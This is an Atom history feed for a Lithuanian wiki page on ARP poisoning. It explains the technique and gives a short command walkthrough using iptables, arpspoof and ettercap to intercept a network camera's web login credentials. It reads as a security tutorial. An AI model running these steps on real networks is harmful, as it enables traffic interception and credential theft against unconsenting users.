<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="lt">
	<id>https://wiki.eofnet.lt/w//index.php?action=history&amp;feed=atom&amp;title=ARP_Poisoning</id>
	<title>ARP Poisoning - Versijų istorija</title>
	<link rel="self" type="application/atom+xml" href="https://wiki.eofnet.lt/w//index.php?action=history&amp;feed=atom&amp;title=ARP_Poisoning"/>
	<link rel="alternate" type="text/html" href="https://wiki.eofnet.lt/w//index.php?title=ARP_Poisoning&amp;action=history"/>
	<updated>2026-04-19T10:45:19Z</updated>
	<subtitle>Šio puslapio versijų istorija projekte</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://wiki.eofnet.lt/w//index.php?title=ARP_Poisoning&amp;diff=8377&amp;oldid=prev</id>
		<title>\dev\null 05:51, 3 rugpjūčio 2017</title>
		<link rel="alternate" type="text/html" href="https://wiki.eofnet.lt/w//index.php?title=ARP_Poisoning&amp;diff=8377&amp;oldid=prev"/>
		<updated>2017-08-03T05:51:01Z</updated>

		<summary type="html">&lt;p&gt;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Naujas puslapis&lt;/b&gt;&lt;/p&gt;&lt;div&gt;Kompiuteriniuose tinkluose, [[ARP]] spoofing, [[ARP]] cache poisoning ar ARP poison (nuodyjimas), ARP poison routing - meistriška technika, kurią pasitelkus įsibrovėlis siunčia netikras (spoofed) ARP (Address Resolution Protocol) žinutes į lokalų tinklą. Ši technika veikia taip: įsibrovėlio [[MAC]] adresas susiejamas su [[IP]] adresu kito hosto, pvz išeities šliuzo ([[gateway]]). Visas srautas skirtas tam [[IP]] adresui keliauja pas įsibrovėlį.&lt;br /&gt;
&lt;br /&gt;
ARP spoofingas leidžia įsibrovėlui nukreipti į save visą aukos srautą, tokiu atveju įsibrovėlis gali stebėti srautą, keisti srautą, užrausti jį arba pasinaudoti viena iš kitų būdingų atakų pvz.: [[Denial Of Service]], [[Man In The Middle]] arba sesijos perėmimo ([[session hijacking]]) ataka.&lt;br /&gt;
&lt;br /&gt;
Ataka veiksminga tiktai tinkluose kuriuose naudojamas [[ARP]] (Address Resolution protokolas) ir apsiriboja veikimu tiktai [[Lokalus tinklas|lokalaus tinklo]] segmentuose.&lt;br /&gt;
&lt;br /&gt;
= Intro =&lt;br /&gt;
&lt;br /&gt;
Tikslas: gauti stebėjimo kameros esancios tinkle, web interfeiso prisijungimus (username, password) ip: 192.168.1.51&lt;br /&gt;
* Tinklo konfiguracija:&lt;br /&gt;
* subnet: 255.255.255.0&lt;br /&gt;
* router: 192.168.1.1&lt;br /&gt;
&lt;br /&gt;
= Diegimas =&lt;br /&gt;
&lt;br /&gt;
Susidedam tinklo irankius&lt;br /&gt;
 apt-get install build-essential ettercap&lt;br /&gt;
 git clone https://github.com/smikims/arpspoof.git &lt;br /&gt;
 cd arpspoof&lt;br /&gt;
 make&lt;br /&gt;
&lt;br /&gt;
= Panaudojimas =&lt;br /&gt;
Redirektinam 80 (http) porto srauta i 1024 porta&lt;br /&gt;
 iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1024&lt;br /&gt;
Nustatom arpspoof&lt;br /&gt;
 ./arpspoof -i eth0 192.168.1.51&lt;br /&gt;
Gaudom srauta&lt;br /&gt;
 ettercap -Tq -i eth0 -w capturas&lt;br /&gt;
Kai vyksta routerio atsijungimas, arba jeigu turime prisijungimus darome restart. Tuo metu jeigu kas nors jungsis i webcam'a, srautas redirectinisis i musu paketu stebejima. Gauname srauta...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:Tinklas]]&lt;br /&gt;
[[Category:Saugumas]]&lt;/div&gt;</summary>
		<author><name>\dev\null</name></author>
	</entry>
</feed>